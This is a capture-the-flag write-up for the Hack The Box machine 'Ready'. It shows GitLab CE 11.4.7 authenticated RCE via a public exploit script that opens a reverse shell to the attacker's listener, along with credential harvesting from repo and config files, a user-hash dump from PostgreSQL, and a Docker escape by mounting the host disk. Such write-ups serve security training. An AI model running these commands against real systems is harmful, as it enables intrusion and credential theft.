HTB - Ready
Ready
Contents
Write Up
Two open ports, 22 and a web server on 5080. The web server is hosting an instance of GitLab. Signing up works without verification and lets me onto the GitLab dashboard. There’s one public project called ready-channel, created by user “dude”. The project repo houses a drupal install and we pick up some mysql credentials(drupaluser : %%cHzhNC=k9yYN!T) from the settings.php file. The GitLab version that’s running is CE 11.4.7, which has an authenticated RCE vulnerability. python3 49334.py -u test1 -p password1 -g http://ready.htb -l 10.10.14.8 -P 4040 pops a reverse shell on our listener as the git user. python3 -c 'import pty; pty.spawn("/bin/bash")' to upgrade our shell. We’re able to pick up the user flag from dude’s home folder.
Now that we’re in, we know that the GitLab install has the dude account and password inside it’s database, so that’s our next target. /var/opt/gitlab/gitlab-rails/etc/database.yml contains the information we need to log in to the GitLab postgresql database.
psql -h /var/opt/gitlab/postgresql -p 5432 -U gitlab -d gitlabhq_production
\pset pager 0
\dt
\d+ users
SELECT username,email,encrypted_password FROM users;
After a few hours of running hashcat with rockyou, this probably isn’t the path we’re supposed to take. There is a file called root_pass that has YG65407Bjqvv9A0a8Tm_7w in it, but that doesn’t seem to work with any login points. The .dockerenv file suggests we’re inside of a docker container as well. After tons of manual searching and enumeration, I load up linpeas and it finds a password I didn’t catch before. /opt/backup/gitlab.rb:gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h". Testing this password with su gets us logged into root. Now we need to escape the docker container.
fdisk -l shows we have access to the /dev/sda disk.
Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: gpt
Disk identifier: 32558524-85A4-4072-AA28-FA341BE86C2E
Device Start End Sectors Size Type
/dev/sda1 2048 4095 2048 1M BIOS boot
/dev/sda2 4096 37746687 37742592 18G Linux filesystem
/dev/sda3 37746688 41940991 4194304 2G Linux swap
After creating a directory in /mnt/, I’m able to mount sda2 and navigate into the file system outside of the docker container. The root folder contains our flag.
Recon
Initial Scan:
nmap -sV $READY
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
5080/tcp open http nginx
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Script/version scan:
nmap -sC -sV -p22,5080 10.10.10.220
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://ready.htb:5080/users/sign_in
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
WFuzz:
wfuzz -c -u http://ready.htb:5080/FUZZ/ -w /usr/share/wordlists/dirb/common.txt --hc 404,401,302
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001575: 301 0 L 5 W 171 Ch "favicon.ico"
000001536: 200 244 L 779 W 13035 Ch "explore"
000001886: 200 229 L 2389 W 37655 Ch "help"
000003207: 200 245 L 785 W 13114 Ch "public"
000003436: 200 72 L 207 W 2095 Ch "robots.txt"
000003441: 200 299 L 938 W 15493 Ch "root"
000003525: 200 200 L 731 W 12392 Ch "search"
000004008: 200 299 L 938 W 15452 Ch "test"
000004010: 200 299 L 938 W 15475 Ch "test1"
Credentials
MySQL:
http://ready.htb:5080/dude/ready-channel/blob/master/sites/default/settings.php
'database' => 'drupal',
'username' => 'drupaluser',
'password' => '%%cHzhNC=k9yYN!T',
'host' => 'localhost',
Postgresql
/var/opt/gitlab/gitlab-rails/etc/database.yml
database: gitlabhq_production
pool: 10
username: "gitlab"
password:
host: "/var/opt/gitlab/postgresql"
port: 5432
GitLab
username | email | encrypted_password
----------------------------------+-------------------------------------------+--------------------------------------------------------------
root | admin@example.com | $2a$10$.Kc4bwq3BqLCEzAGJVIJFeK4emNnucvAqk1vCv4Yp45yy2nmrFa.2
test1 | test1@test.test | $2a$10$3UWZ0vuKf/AHOjphoObmRO4Y2fACSFmdeRmU5iKUT/TNyDgWltJba
mitroglou | mitroglou@ready.com | $2a$10$4vZAglOnEdNEe1SoNj1IE.RfotOt9gPnOXBEihjd7QBhsUmgmAdLi
dude | dude@ready.com | $2a$10$NOMTXhO31vqykicMa6zj3O.F5PIyI9q/S4c.v22eMSfXNDdtpI2Mm
test | test@test.gr | $2a$10$7xK1UPcwvjWIo4ioCz28GeFSt.NR00AHsY2AF.gWzaWwikRVXCTXa
eb8a31bc5f2e4f8284c5a18b115cef77 | eb8a31bc5f2e4f8284c5a18b115cef77@mail.htb | $2a$10$.aOidQ2aprnoXvfDNyNfGOuMLqcLkPljHsPeV8j7BZA4GU.5p1ZXm
Host:
git :
Misc:
/opt/backup/gitlab.rb:gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
Notes
- GitLab Community Edition 11.4.7
- /var/opt/gitlab/gitlab-rails/etc/secrets.yml